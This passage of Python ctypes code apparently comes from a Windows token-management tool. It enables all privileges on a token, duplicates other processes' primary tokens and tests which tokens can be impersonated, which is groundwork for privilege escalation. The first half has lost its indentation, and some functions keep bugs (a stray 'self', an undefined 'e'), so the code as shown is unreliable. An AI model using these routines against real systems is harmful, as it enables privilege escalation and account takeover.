        res = GetSidSubAuthority(integrityLvlInfo.Label.Sid, (pSidSize.contents.value - 1))
        level = res.contents.value
        logging.debug('Integrity level Value from handle: {0}'.format(level))
        return level
def getTokenIntegrityLevelAsString(hToken):
level = TokenManager.getTokenIntegrityLevel(hToken)
intLvlString = MAPPING_INTEGRITY_LEVEL.get(level)
logging.debug('Integrity Level from handle: {0} ({1})'.format(intLvlString, level))
return intLvlString
def getTokenInformationTokenGroups(hToken):
allGroups = []
returnLength = DWORD()
res = GetTokenInformation(hToken, TokenGroups, None, 0, returnLength)
if (returnLength == 0):
logging.error('Impossible to get size before getting Token Groups: {0}'.format(GetLastError()))
return None
buffer = create_string_buffer(returnLength.value)
res = GetTokenInformation(hToken, TokenGroups, byref(buffer), returnLength.value, returnLength)
if (returnLength == 0):
logging.error('Impossible to get Token Groups: {0}'.format(e))
return None
groupsCount = cast(buffer, POINTER(ULONG))[0]
groups = cast(buffer, POINTER(tokenGroups(groupsCount)))[0]
for i in range(groups.GroupCount):
aGroup = groups.Groups[i]
allGroups.append(aGroup)
return allGroups
def getTokenInformationTokenSessionId(hToken):
returnLength = DWORD()
res = GetTokenInformation(hToken, TokenSessionId, None, 0, returnLength)
if (returnLength == 0):
logging.error('Impossible to get size before getting TokenSession Id: {0}'.format(GetLastError()))
return None
buffer = create_string_buffer(returnLength.value)
res = GetTokenInformation(hToken, TokenSessionId, byref(buffer), returnLength.value, returnLength)
if (returnLength == 0):
logging.error('Impossible to get TokenSession Id: {0}'.format(e))
return None
id = cast(buffer, POINTER(DWORD)).contents.value
return id
def getTokenInformationTokenLogonSid(hToken):
infoSize = DWORD(0)
status = GetTokenInformation(hToken, TokenLogonSid, c_void_p(), 0, byref(infoSize))
if ((status == 0) or (infoSize.value == 0)):
errorMessage = getLastErrorMessage()
if (errorMessage.winerror == ERROR_INSUFFICIENT_BUFFER):
pass
if (errorMessage.winerror == ERROR_NOT_FOUND):
logging.debug('Impossible to get size for getTokenLogonSid: {0}'.format(errorMessage))
return None
else:
logging.debug('Impossible to get size for getTokenLogonSid: {0}'.format(errorMessage))
return None
buffer = create_string_buffer(infoSize.value)
status = GetTokenInformation(hToken, TokenLogonSid, byref(buffer), infoSize, byref(infoSize))
if (status == 0):
logging.debug('Impossible to get getTokenLogonSid: {0}'.format(getLastErrorMessage()))
return None
groupsCount = cast(buffer, POINTER(ULONG))[0]
groups = cast(buffer, POINTER(tokenGroups(groupsCount)))[0]
return groups
def getAllUserRightsForEffectiveToken():
hToken = TokenManager.getCurrentThreadEffectiveToken()
if (hToken == None):
return None
privs = TokenManager.getAllUserRights(hToken)
TokenManager.closeHandle(hToken)
return privs
def printAllEffectiveUserRights(printOnDebug=False):
info = TokenManager.getAllUserRightsForEffectiveToken()
if (info == None):
logging.error('Impossible to print all User Rights (privileges) associated with the current thread')
return None
m = 'Privileges (User Rights) for current thread:'
if (printOnDebug == True):
logging.debug(m)
else:
print(m)
for aPriv in info:
if (info[aPriv] & SE_PRIVILEGE_ENABLED):
m = '- {0}: Enabled'.format(aPriv)
if (printOnDebug == True):
logging.debug(m)
else:
print(m)
elif (info[aPriv] & SE_PRIVILEGE_ENABLED_BY_DEFAULT):
m = '- {0}: Enabled by default'.format(aPriv)
if (printOnDebug == True):
logging.debug(m)
else:
print(m)
else:
m = '- {0}: Disabled'.format(aPriv)
if (printOnDebug == True):
logging.debug(m)
else:
print(m)
return True
def getAllUserRights(hToken):
privDict = {}
if (hToken == None):
logging.error('Impossible to Get all User Rights, hToken is set to None')
return None
privileges = TokenManager.getTokenInformationTokenPrivileges(hToken)
if (privileges == None):
logging.error('Impossible to Get all User Rights')
return None
logging.debug('Number of privileges: {0}'.format(privileges.PrivilegeCount))
for aPriv in privileges:
privName = aPriv.getName()
privDict[privName] = aPriv.Attributes
return privDict
def getAllUserRightsForPrimaryToken():
hToken = TokenManager.getCurrentProcessToken()
if (hToken == None):
return None
privs = TokenManager.getAllUserRights(hToken)
TokenManager.closeHandle(hToken)
return privs
def getUserRightStatus(hToken, userRightName):
userRightsDict = TokenManager.getAllUserRights(hToken)
if (userRightsDict == None):
return None
if (userRightName in userRightsDict):
return userRightsDict[userRightName]
else:
return None
def getUserRightStatusForPrimaryToken(userRightName):
userRightsDict = TokenManager.getAllUserRightsForPrimaryToken()
if (userRightsDict == None):
return None
if (userRightName in userRightsDict):
return userRightsDict[userRightName]
else:
return None
def getUserRightStatusForEffectiveToken(userRightName):
userRightsDict = TokenManager.getAllUserRightsForEffectiveToken()
if (userRightsDict == None):
return None
if (userRightName in userRightsDict):
return userRightsDict[userRightName]
else:
return None
def getUserRightsEnabledForPrimaryToken():
userRightsEnabled = []
userRightsDict = TokenManager.getAllUserRightsForPrimaryToken()
if (userRightsDict == None):
return None
for aUserRightName in userRightsDict:
if (bool((userRightsDict[aUserRightName] & SE_PRIVILEGE_ENABLED)) == True):
userRightsEnabled.append(aUserRightName)
logging.debug('User Rights enabled for current process: {0}'.format(userRightsEnabled))
return userRightsEnabled
def getUserRightsEnabledForEffectiveToken():
userRightsEnabled = []
userRightsDict = TokenManager.getAllUserRightsForEffectiveToken()
if (userRightsDict == None):
return None
for aUserRightName in userRightsDict:
if (bool((userRightsDict[aUserRightName] & SE_PRIVILEGE_ENABLED)) == True):
userRightsEnabled.append(aUserRightName)
logging.debug('User Rights enabled for current process: {0}'.format(userRightsEnabled))
return userRightsEnabled
def enableUserRight(privilegeStr, hToken=None):
if (hToken == None):
logging.debug('Trying to enable the User Right {0} on effective token...'.format(repr(privilegeStr)))
allUserRights = TokenManager.getAllUserRightsForEffectiveToken()
else:
logging.debug('Trying to enable the User Right {0} on chosen token...'.format(repr(privilegeStr)))
allUserRights = self.getAllUserRights(hToken)
if (allUserRights == None):
return False
if (privilegeStr not in allUserRights):
logging.info('Current token has not the right {0}, impossible to enable it'.format(repr(privilegeStr)))
return False
if (bool((allUserRights[privilegeStr] & SE_PRIVILEGE_ENABLED)) == True):
logging.debug('User Right {0} is already enabled on token, nothing to do'.format(privilegeStr))
return True
if (hToken == None):
dAcess = (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY)
theTokenToMod = TokenManager.getCurrentThreadEffectiveToken(desiredAccessThread=dAcess, desiredAccessProcess=dAcess)
else:
theTokenToMod = hToken
status = TokenManager.adjustTokenPrivileges(theTokenToMod, privilegeStr, state=SE_PRIVILEGE_ENABLED)
if (hToken == None):
TokenManager.closeHandle(theTokenToMod)
return status
def disableAllUserRights(hToken=None):
    """Disable (remove) every currently-enabled privilege on a token.

    hToken -- token handle to modify; None means the current thread's
              effective token, which is opened and closed here.
    Returns True on success, False when the privilege list cannot be read.
    """
    if hToken is None:
        logging.debug('Trying to disable all User Rights on effective token...')
        allUserRights = TokenManager.getAllUserRightsForEffectiveToken()
        dAccess = (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY)
        theTokenToMod = TokenManager.getCurrentThreadEffectiveToken(desiredAccessThread=dAccess, desiredAccessProcess=dAccess)
    else:
        logging.debug('Trying to disable all User Rights on chosen token...')
        # BUGFIX: module-level function, there is no 'self' here; the original
        # 'self.getAllUserRights(hToken)' raised NameError.
        allUserRights = TokenManager.getAllUserRights(hToken)
        theTokenToMod = hToken
    if allUserRights is None:
        # BUGFIX: the original iterated over None when the rights could not be
        # read (TypeError) and leaked the freshly opened handle.
        if hToken is None:
            TokenManager.closeHandle(theTokenToMod)
        return False
    for aPrivName in allUserRights:
        if bool(allUserRights[aPrivName] & SE_PRIVILEGE_ENABLED):
            status = TokenManager.adjustTokenPrivileges(theTokenToMod, aPrivName, state=SE_PRIVILEGE_REMOVED)
    if hToken is None:
        TokenManager.closeHandle(theTokenToMod)
    return True
def enableAllUserRights(hToken=None):
    """Enable every privilege present on a token.

    hToken -- token handle to modify; None means the current thread's
              effective token, which is opened and closed here.
    Returns True on success, False when the privilege list cannot be read.
    """
    if hToken is None:
        logging.debug('Trying to enable all User Rights on effective token...')
        allUserRights = TokenManager.getAllUserRightsForEffectiveToken()
        dAccess = (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY)
        theTokenToMod = TokenManager.getCurrentThreadEffectiveToken(desiredAccessThread=dAccess, desiredAccessProcess=dAccess)
    else:
        logging.debug('Trying to enable all User Rights on chosen token...')
        # BUGFIX: module-level function, there is no 'self' here; the original
        # 'self.getAllUserRights(hToken)' raised NameError.
        allUserRights = TokenManager.getAllUserRights(hToken)
        theTokenToMod = hToken
    if allUserRights is None:
        logging.error('Impossible to get all user rights for current effective thread')
        # BUGFIX: close the handle we opened before bailing out (was leaked).
        if hToken is None:
            TokenManager.closeHandle(theTokenToMod)
        return False
    for aPrivName in allUserRights:
        if not bool(allUserRights[aPrivName] & SE_PRIVILEGE_ENABLED):
            status = TokenManager.adjustTokenPrivileges(theTokenToMod, aPrivName, state=SE_PRIVILEGE_ENABLED)
    if hToken is None:
        TokenManager.closeHandle(theTokenToMod)
    return True
def lookupPrivilegeValue(privilegeStr):
    """Resolve a privilege name to its LUID via LookupPrivilegeValue().

    Returns the LUID structure, or None on failure.
    """
    privilegeName = str(privilegeStr)
    privilegeId = LUID()
    try:
        LookupPrivilegeValue(None, privilegeName, byref(privilegeId))
    except Exception as e:
        logging.error('Impossible to LookupPrivilegeValue for {0}: {1}'.format(str(privilegeName), e))
        return None
    return privilegeId
def adjustTokenPrivileges(hToken, privilegeStr, state=SE_PRIVILEGE_ENABLED):
    """Set a single privilege on *hToken* to *state* (e.g. SE_PRIVILEGE_ENABLED).

    Returns True on success, False when the privilege LUID cannot be resolved
    or AdjustTokenPrivileges() fails.
    """
    privilegeName = str(privilegeStr)
    privilegeId = TokenManager.lookupPrivilegeValue(privilegeStr)
    if (privilegeId == None):
        return False
    # Build a one-entry TOKEN_PRIVILEGES structure for AdjustTokenPrivileges().
    newPriv = TOKEN_PRIVILEGES()
    newPriv.PrivilegeCount = 1
    newPriv.Privileges[0].Luid = privilegeId
    newPriv.Privileges[0].Attributes = state
    try:
        AdjustTokenPrivileges(hToken, False, byref(newPriv), sizeof(newPriv), None, None)
    except Exception as e:
        logging.error('Impossible to AdjustTokenPrivileges for {0}: {1}'.format(str(privilegeName), e))
        return False
    logging.debug('Privilege {0} is {1} now on token'.format(repr(privilegeStr), state))
    return True
def isRestrictedToken(hToken):
    """Return True if *hToken* is a restricted token, False if not, None on error.

    IsTokenRestricted() returns 0 both for 'not restricted' and for failure,
    so the last Win32 error is checked to tell the two cases apart.
    """
    status = IsTokenRestricted(hToken)
    if (status == 0):
        errorMessage = getLastErrorMessage()
        if (errorMessage.winerror == ERROR_SUCCESS):
            # No error set: the token is simply not restricted.
            return False
        else:
            logging.error('Impossible to get restricted token status: {0}'.format(errorMessage))
            return None
    else:
        return True
def canImpersonateToken(hToken, loggingOnError=False):
    """Probe whether *hToken* can be impersonated by the current thread.

    Tries ImpersonateLoggedOnUser() and immediately reverts.
    loggingOnError -- when False, failures are logged at error level;
                      when True, only at debug level.
    Returns True when impersonation succeeded, False otherwise.
    """
    try:
        ImpersonateLoggedOnUser(hToken)
    except Exception as e:
        m = 'Impossible to impersonate handle: {0}'.format(e)
        if (loggingOnError == False):
            logging.error(m)
        else:
            logging.debug(m)
        return False
    else:
        # Undo the impersonation right away; we only wanted to test it.
        try:
            RevertToSelf()
        except Exception as e:
            logging.critical('Impossible to terminate the impersonation: {0}'.format(e))
        logging.debug('Impersonation of token {0}: successful'.format(hToken))
        return True
def getPrimaryTokenOfPid(pid, impersonation=True, loggingOnError=False, full=True):
    """Open the primary token of process *pid* and return its details dict.

    The dict is built by extractTokenInfo(); when *impersonation* is True an
    additional 'canimpersonate' key records whether the token could be
    impersonated (probed through a second QUERY|DUPLICATE handle).
    Returns None when the token cannot be opened.
    NOTE(review): the handle stored under 'token' in the returned dict is NOT
    closed here — the caller appears responsible for closing it; confirm.
    """
    tokenDetails = None
    logging.debug('Getting primary token of pid {0}...'.format(pid))
    pToken = TokenManager.getProcessTokenOfPid(pid, tokenAcess=MAXIMUM_ALLOWED, loggingOnError=loggingOnError)
    if (pToken == None):
        return None
    else:
        canImpersonate = None
        if (impersonation == True):
            canImpersonate = False
            # Second, temporary handle used only for the impersonation probe.
            hPrimaryToken = TokenManager.getProcessTokenOfPid(pid, tokenAcess=(TOKEN_QUERY | TOKEN_DUPLICATE), loggingOnError=loggingOnError)
            if (hPrimaryToken != None):
                canImpersonate = TokenManager.canImpersonateToken(hPrimaryToken, loggingOnError=loggingOnError)
                if (canImpersonate == True):
                    logging.debug('We can impersonate primary token of pid {0}'.format(pid))
                else:
                    logging.debug('We can NOT impersonate primary token of pid {0}'.format(pid))
                TokenManager.closeHandle(hPrimaryToken)
            else:
                pass
        tokenDetails = TokenManager.extractTokenInfo(pToken, handleValue=None, handleID=None, full=full)
        tokenDetails['canimpersonate'] = canImpersonate
        logging.debug('Primary token of pid {0} got'.format(pid))
    return tokenDetails
def getImpersonationTokenFromPrimaryTokenForPID(pid, desiredAccess=TOKEN_ALL_ACCESS, loggingOnError=True):
    """Duplicate the primary token of process *pid* and return the new handle.

    The source handle is opened with TOKEN_DUPLICATE only and closed before
    returning; the caller owns the returned duplicated handle.
    Returns None on failure.
    NOTE(review): despite the function name, the duplicate is created with
    tokenType=TokenPrimary (at SecurityImpersonation level) — confirm intent.
    """
    hTokendupe = None
    hToken = TokenManager.getProcessTokenOfPid(pid, tokenAcess=TOKEN_DUPLICATE, loggingOnError=loggingOnError)
    if (hToken == None):
        return None
    hTokendupe = TokenManager.duplicateToken(hToken, impersonationLevel=SecurityImpersonation, desiredAccess=desiredAccess, tokenType=TokenPrimary)
    if (hTokendupe == None):
        logging.error('Impossible to Duplicate Token from primary token of pid {0}'.format(pid))
        TokenManager.closeHandle(hToken)
        return None
    TokenManager.closeHandle(hToken)
    return hTokendupe
def getImpersonationTokenFromPrimaryTokenForCurrentProcess(desiredAccess=TOKEN_ALL_ACCESS):
    """Duplicate the current process's primary token and return the new handle.

    The source handle is closed before returning; the caller owns the
    returned duplicated handle. Returns None on failure.
    """
    hTokendupe = None
    hToken = TokenManager.getCurrentProcessToken()
    if hToken is None:
        return None
    hTokendupe = TokenManager.duplicateToken(hToken, impersonationLevel=SecurityImpersonation, desiredAccess=desiredAccess, tokenType=TokenPrimary)
    if hTokendupe is None:
        # BUGFIX: the original called .format(pid) here, but 'pid' is not
        # defined in this function — the error path raised NameError.
        logging.error('Impossible to Duplicate Token from primary token for current process')
        TokenManager.closeHandle(hToken)
        return None
    TokenManager.closeHandle(hToken)
    return hTokendupe
def isEffectiveTokenInBuiltinAdministrators():
    """Check whether the current effective token belongs to BUILTIN\\Administrators.

    Returns True/False from checkTokenMembership(), or None when the
    well-known SID cannot be created.
    """
    SECURITY_MAX_SID_SIZE = 68
    sid = create_string_buffer(SECURITY_MAX_SID_SIZE)
    size = DWORD(SECURITY_MAX_SID_SIZE)
    try:
        CreateWellKnownSid(WELL_KNOWN_SID_TYPE.WinBuiltinAdministratorsSid, None, byref(sid), byref(size))
    except Exception as e:
        logging.error('Impossible to get the Builtin Administrators Sid: {0}'.format(e))
        return None
    # hToken=None means 'use the current effective token'.
    return TokenManager.checkTokenMembership(sid, None)
def isTokenInBuiltinAdministrators(hToken):
    """Check whether *hToken* belongs to BUILTIN\\Administrators.

    Returns True/False from checkTokenMembership(), or None when the
    well-known SID cannot be created.
    """
    SECURITY_MAX_SID_SIZE = 68
    sid = create_string_buffer(SECURITY_MAX_SID_SIZE)
    size = DWORD(SECURITY_MAX_SID_SIZE)
    try:
        CreateWellKnownSid(WELL_KNOWN_SID_TYPE.WinBuiltinAdministratorsSid, None, byref(sid), byref(size))
    except Exception as e:
        logging.error('Impossible to get the Builtin Administrators Sid: {0}'.format(e))
        return None
    return TokenManager.checkTokenMembership(sid, hToken)
def checkTokenMembership(sid, hToken=None):
    """Test whether *sid* is an enabled member of *hToken* (None = effective token).

    Uses CheckTokenMembershipEx() when available (so app-container membership
    is included), otherwise falls back to CheckTokenMembership().
    Returns True/False, or None on API failure.
    """
    if CHECK_TOKEN_MEMBERSHIP_EX_AVAILABLE == True:
        CTMF_INCLUDE_APPCONTAINER = 1
        isMember = BOOL()
        try:
            status = CheckTokenMembershipEx(hToken, sid, CTMF_INCLUDE_APPCONTAINER, byref(isMember))
        except Exception as e:
            logging.error('Impossible to CheckTokenMembershipEx(): {0}'.format(e))
            # BUGFIX: removed leftover interactive debugging call 'help(e)',
            # which dumped the exception's pydoc page to stdout on every failure.
            return None
        return bool(isMember.value)
    else:
        isMember = BOOL()
        try:
            # NOTE: the fallback API takes the SID by reference, unlike the Ex variant.
            CheckTokenMembership(hToken, byref(sid), byref(isMember))
        except Exception as e:
            logging.error('Impossible to CheckTokenMembership(): {0}'.format(e))
            return None
        return bool(isMember.value)
def getCurrentThreadToken(desiredAccess=TOKEN_QUERY):
    """Open the current thread's impersonation token.

    Returns the token HANDLE, or None when the thread is not impersonating
    (ERROR_NO_TOKEN) or when OpenThreadToken() fails.
    """
    logging.debug('Getting current thread token')
    # Cleanup: removed unused local 'openAsSelf' from the original.
    hToken = HANDLE(c_void_p(-1).value)
    hThread = GetCurrentThread()
    try:
        # Third argument (OpenAsSelf) is False: the access check is done
        # against the thread's current security context.
        OpenThreadToken(hThread, desiredAccess, False, byref(hToken))
    except Exception as e:
        logging.error('Impossible to OpenThreadToken 1: {0}'.format(e))
        return None
    if hToken.value is None:
        errorMessage = getLastErrorMessage()
        if errorMessage.winerror == ERROR_NO_TOKEN:
            logging.debug('Current thread is not impersonating. Consequently, NO impersonation token for current thread ')
        else:
            logging.error('Impossible to OpenThreadToken 2: {0}'.format(getLastErrorMessage()))
        return None
    return hToken
def getCurrentThreadEffectiveToken(desiredAccessThread=TOKEN_QUERY, desiredAccessProcess=TOKEN_QUERY):
    """Return the token that is effective for the current thread.

    Prefers the thread's impersonation token; when the thread is not
    impersonating, falls back to the process's primary token.
    """
    hThreadToken = TokenManager.getCurrentThreadToken(desiredAccess=desiredAccessThread)
    if hThreadToken is not None:
        return hThreadToken
    return TokenManager.getCurrentProcessToken(desiredAccess=desiredAccessProcess)
def printCurrentPrimaryToken(printFull=True, printLinked=True):
    """Print the current process's primary token details on stdout.

    Returns True on success, None when the token cannot be opened.
    """
    print('Current primary token:')
    logging.debug('Printing current primary token on stdout')
    hToken = TokenManager.getCurrentProcessToken()
    if (hToken == None):
        print('Impossible to get primary token for current process')
        return None
    tokenDetails = TokenManager.extractTokenInfo(hToken)
    # -1 is used as a placeholder PID for printTokens()'s dict layout.
    TokenManager.printTokens({(- 1): [tokenDetails]}, printFull=printFull, printLinked=printLinked)
    TokenManager.closeHandle(hToken)
    return True
def printCurrentThreadToken(printFull=True, printLinked=True):
    """Print the current thread's impersonation token details on stdout.

    Returns True on success, None when the thread is not impersonating.
    """
    print('Current Thread token:')
    logging.debug('Printing current thread token on stdout')
    hToken = TokenManager.getCurrentThreadToken()
    if (hToken == None):
        print('Current Thread is not impersonating. Consequently, no impersonation token for current thread')
        return None
    tokenDetails = TokenManager.extractTokenInfo(hToken)
    # -1 is used as a placeholder PID for printTokens()'s dict layout.
    TokenManager.printTokens({(- 1): [tokenDetails]}, printFull=printFull, printLinked=printLinked)
    TokenManager.closeHandle(hToken)
    return True
def printCurrentThreadEffectiveToken(printFull=True, printLinked=True):
    """Print the details of the token effective for the current thread on stdout.

    Returns True on success, None when no token could be obtained.
    """
    print('Current Thread token:')
    logging.debug('Printing current thread token on stdout')
    hToken = TokenManager.getCurrentThreadEffectiveToken()
    if (hToken == None):
        return None
    TokenManager.printTokenFromHandle(hToken, printFull=printFull, printLinked=printLinked)
    TokenManager.closeHandle(hToken)
    return True
def printTokenFromHandle(hToken, printFull=True, printLinked=True):
    """Extract and pretty-print the details of a single token handle (placeholder PID -1)."""
    details = TokenManager.extractTokenInfo(hToken)
    TokenManager.printTokens({-1: [details]}, printFull=printFull, printLinked=printLinked)
def extractTokenInfo(pToken, handleValue=None, handleID=None, full=True):
    """Build a dictionary describing *pToken* (type, SID, privileges, groups, ...).

    handleValue / handleID -- bookkeeping values stored for impersonation
                              tokens only (primary tokens get None).
    full -- when True, also collect the expensive/optional fields
            (owner, groups, privileges, linked token, DACL, ...).
    Returns the details dict consumed by printTokens()/filterTokens().
    """
    tokenDetails = {}
    tokenDetails['type'] = TokenManager.getTokenInformationTokenType(pToken)
    # Store the raw handle value, unwrapping a ctypes c_void_p if needed.
    if (isinstance(pToken, c_void_p) == True):
        tokenDetails['token'] = pToken.value
    else:
        tokenDetails['token'] = pToken
    if (tokenDetails['type'] == TokenPrimary):
        tokenDetails['hval'] = None
        tokenDetails['ihandle'] = None
    else:
        tokenDetails['hval'] = handleValue
        tokenDetails['ihandle'] = handleID
    tokenDetails['sid'] = TokenManager.getTokenSid(pToken)
    tokenDetails['accountname'] = TokenManager.getTokenAccountName(pToken)
    tokenDetails['intlvl'] = TokenManager.getTokenIntegrityLevelAsString(pToken)
    if (full == True):
        tokenDetails['owner'] = TokenManager.getTokenOwnerSid(pToken)
        tokenDetails['groups'] = TokenManager.getTokenInformationTokenGroups(pToken)
        tokenDetails['priv'] = TokenManager.getAllUserRights(pToken)
        tokenDetails['issystem'] = TokenManager.isSystemToken(pToken)
        tokenDetails['sessionID'] = TokenManager.getTokenInformationTokenSessionId(pToken)
    tokenDetails['elevationtype'] = TokenManager.getTokenInformationTokenElevationType(pToken)
    tokenDetails['iselevated'] = TokenManager.getTokenInformationTokenElevation(pToken)
    if (tokenDetails['type'] == TokenPrimary):
        if (full == True):
            # Only a limited (filtered-admin) token carries a useful linked token.
            if (tokenDetails['elevationtype'] == TokenElevationTypeLimited):
                tokenDetails['linkedtoken'] = TokenManager.getTokenInformationTokenLinkedToken(pToken)
            else:
                tokenDetails['linkedtoken'] = None
        else:
            tokenDetails['linkedtoken'] = None
    tokenDetails['implevel'] = TokenManager.getTokenInformationTokenImpersonationLevel(pToken)
    if (full == True):
        # Token source is only meaningful for primary tokens here.
        if (tokenDetails['type'] == TokenPrimary):
            tokenDetails['tokensource'] = TokenManager.getTokenSourceName(pToken)
        else:
            tokenDetails['tokensource'] = None
    if (full == True):
        tokenDetails['appcontainertoken'] = TokenManager.isAppContainerToken(pToken)
        tokenDetails['appcontainersid'] = TokenManager.getTokenInformationAppContainerSid(pToken)
        tokenDetails['appcontainernumber'] = TokenManager.getTokenInformationTokenAppContainerNumber(pToken)
        tokenDetails['primarysidgroup'] = TokenManager.getTokenPrimaryGroupSID(pToken)
        tokenDetails['isrestricted'] = TokenManager.isRestrictedToken(pToken)
        tokenDetails['hasrestricitions'] = TokenManager.isTokenHasRestrictions(pToken)
        tokenDetails['defaultdacl'] = TokenManager.getTokenDefaultDacl(pToken)
        tokenDetails['logonsid'] = TokenManager.getTokenInformationTokenLogonSid(pToken)
        tokenDetails['mandatorypolicy'] = TokenManager.getTokenInformationTokenMandatoryPolicy(pToken)
    return tokenDetails
def filterTokens(self, allTokens, targetPIDs=None, sid=None, intLevel=None, canImpersonate=True):
    """Filter an extractTokenInfo()-style dict {pid: [tokenDetails, ...]}.

    targetPIDs     -- restrict to these PIDs (None = all PIDs).
    sid            -- keep only tokens with this SID (None = any).
    intLevel       -- keep only tokens at this integrity level (None = any).
    canImpersonate -- keep only tokens with this 'canimpersonate' value
                      (None = any).
    Returns a new dict with the same layout containing only matching tokens.
    """
    interestingTokenInfo = {}
    if targetPIDs is None:
        targetPIDs = allTokens.keys()
    for aPID in allTokens:
        if aPID not in targetPIDs:
            continue
        for aTokenInfo in allTokens[aPID]:
            okSID = None
            okIntLevel = None
            okCanImpersonate = None
            if sid is not None:
                okSID = (aTokenInfo['sid'] == sid)
            if intLevel is not None:
                # BUGFIX: extractTokenInfo() stores the integrity level under
                # the key 'intlvl'; the original read 'intlevel' and raised
                # KeyError whenever an intLevel filter was supplied.
                okIntLevel = (aTokenInfo['intlvl'] == intLevel)
            if canImpersonate is not None:
                okCanImpersonate = (aTokenInfo['canimpersonate'] == canImpersonate)
            # None means "criterion not requested"; True means "matched".
            if ((okSID in [True, None]) and (okIntLevel in [True, None]) and (okCanImpersonate in [True, None])):
                if aPID in interestingTokenInfo:
                    interestingTokenInfo[aPID].append(aTokenInfo)
                else:
                    interestingTokenInfo[aPID] = [aTokenInfo]
                logging.debug('A token found according to your criteria (pid {0}): {1}'.format(aPID, aTokenInfo))
    return interestingTokenInfo
def printThisToken(allTokens, pid, iHandle=None):
    """Print the token of *pid* whose 'ihandle' equals *iHandle*.

    Returns True when a matching token was printed, False when *pid* exists
    but no token matched, and None when *pid* is not in *allTokens*.
    """
    if pid not in allTokens:
        return None
    for tokenInfo in allTokens[pid]:
        if tokenInfo['ihandle'] == iHandle:
            TokenManager.printTokens({pid: [tokenInfo]})
            return True
    return False
def printTokens(allTokens, printFull=True, printLinked=False, initialTab=' ', tab=' '):
    """Pretty-print a {pid: [tokenDetails, ...]} dict on stdout.

    printFull   -- include verbose sections (privileges, groups, default DACL).
    printLinked -- recursively print each token's linked token.
    initialTab/tab -- indentation strings; initialTab == tab marks the
                     top-level call (recursive calls pass a wider tab).
    Returns True on success, False when the dict is empty or None.
    """
    logging.debug('Printing all tokens in the dict...')
    if ((allTokens == None) or (allTokens == {})):
        logging.warning('Nothing to print. Dict is empty')
        return False
    for aPID in allTokens:
        if (initialTab == tab):
            print('- PID: {0}'.format(aPID))
        for aTokenInfo in allTokens[aPID]:
            if (initialTab == tab):
                print(('-' * 30))
                print((tab + '- PID: {0}'.format(aPID)))
            for aKey in aTokenInfo:
                # Keys with a human-readable mapping get special rendering.
                if (aKey == 'type'):
                    print((tab + '- {0}: {1} ({2})'.format(aKey, TOKEN_TYPE_DICT[aTokenInfo[aKey]], aTokenInfo[aKey])))
                elif (aKey == 'elevationtype'):
                    print((tab + '- {0}: {1} ({2})'.format(aKey, TOKEN_ELEVATION_TYPE_DICT[aTokenInfo[aKey]], aTokenInfo[aKey])))
                elif (aKey == 'implevel'):
                    print((tab + '- {0}: {1} ({2})'.format(aKey, SECURITY_IMPERSONATION_LEVEL_DICT[aTokenInfo[aKey]], aTokenInfo[aKey])))
                elif (aKey == 'priv'):
                    if (printFull == True):
                        print((tab + '- Privileges (User Rights):'))
                        for aPriv in aTokenInfo[aKey]:
                            if (aTokenInfo[aKey][aPriv] & SE_PRIVILEGE_ENABLED):
                                print(((tab + tab) + '- {0}: Enabled'.format(aPriv)))
                            elif (aTokenInfo[aKey][aPriv] & SE_PRIVILEGE_ENABLED_BY_DEFAULT):
                                print(((tab + tab) + '- {0}: Enabled by default'.format(aPriv)))
                            else:
                                print(((tab + tab) + '- {0}: Disabled'.format(aPriv)))
                elif (aKey == 'groups'):
                    if (printFull == True):
                        print((tab + '- Groups:'))
                        for aGroup in aTokenInfo[aKey]:
                            groupSIDstr = TokenManager.convertSidToStringSid(aGroup.Sid)
                            nameInfo = getNameFromSid(aGroup.Sid)
                            # Decode the SE_GROUP_* attribute bitmask into readable flags.
                            flagStrings = []
                            isEnable = bool((aGroup.Attributes & GroupAttributes.SE_GROUP_ENABLED))
                            isEnableByDefault = bool((aGroup.Attributes & GroupAttributes.SE_GROUP_ENABLED_BY_DEFAULT))
                            isIntegrity = bool((aGroup.Attributes & GroupAttributes.SE_GROUP_INTEGRITY))
                            isIntegrityEnable = bool((aGroup.Attributes & GroupAttributes.SE_GROUP_INTEGRITY_ENABLED))
                            isLogonId = bool((aGroup.Attributes & GroupAttributes.SE_GROUP_LOGON_ID))
                            isOwner = bool((aGroup.Attributes & GroupAttributes.SE_GROUP_OWNER))
                            isResource = bool((aGroup.Attributes & GroupAttributes.SE_GROUP_RESOURCE))
                            isUseForDenyOnly = bool((aGroup.Attributes & GroupAttributes.SE_GROUP_USE_FOR_DENY_ONLY))
                            isMandatory = bool((aGroup.Attributes & GroupAttributes.SE_GROUP_MANDATORY))
                            if (isEnable == True):
                                flagStrings.append('ENABLED')
                            if (isEnableByDefault == True):
                                flagStrings.append('ENABLED_BY_DEFAULT')
                            if (isIntegrityEnable == True):
                                flagStrings.append('INTEGRITY_ENABLED')
                            if (isLogonId == True):
                                flagStrings.append('LOGON_ID')
                            if (isOwner == True):
                                flagStrings.append('OWNER')
                            if (isResource == True):
                                flagStrings.append('RESOURCE')
                            if (isUseForDenyOnly == True):
                                flagStrings.append('USE_FOR_DENY_ONLY')
                            if (isMandatory == True):
                                flagStrings.append('MANDATORY')
                            if (isIntegrity == True):
                                flagStrings.append('INTEGRITY')
                            print(((tab + tab) + '- {0}: {1} ({2})'.format(groupSIDstr, nameInfo, ', '.join(flagStrings))))
                elif ((aKey == 'linkedtoken') and (printLinked == True)):
                    if (aTokenInfo[aKey] != None):
                        print((tab + '- Linked Token:'))
                        # Recurse with a wider tab so the linked token is indented.
                        linkedTokenDetauls = TokenManager.extractTokenInfo(aTokenInfo[aKey])
                        firstTokenLinked = {aPID: [linkedTokenDetauls]}
                        TokenManager.printTokens(allTokens=firstTokenLinked, printFull=printFull, tab=(tab * 3), printLinked=False)
                    else:
                        print((tab + '- Linked Token: None'))
                elif (aKey == 'defaultdacl'):
                    if (printFull == True):
                        print((tab + '- Default DACL:'))
                        for anACE in aTokenInfo[aKey]:
                            print(((tab + tab) + '- {0}'.format(anACE)))
                elif (aKey == 'mandatorypolicy'):
                    if (aTokenInfo[aKey] == None):
                        print((tab + '- Mandatory Policy: {0}'.format('N/A')))
                    elif (aTokenInfo[aKey] == TOKEN_MANDATORY_POLICY_OFF):
                        print((tab + '- Mandatory Policy: {0}'.format('OFF')))
                    elif (aTokenInfo[aKey] == TOKEN_MANDATORY_POLICY_NO_WRITE_UP):
                        print((tab + '- Mandatory Policy: {0}'.format('NO_WRITE_UP')))
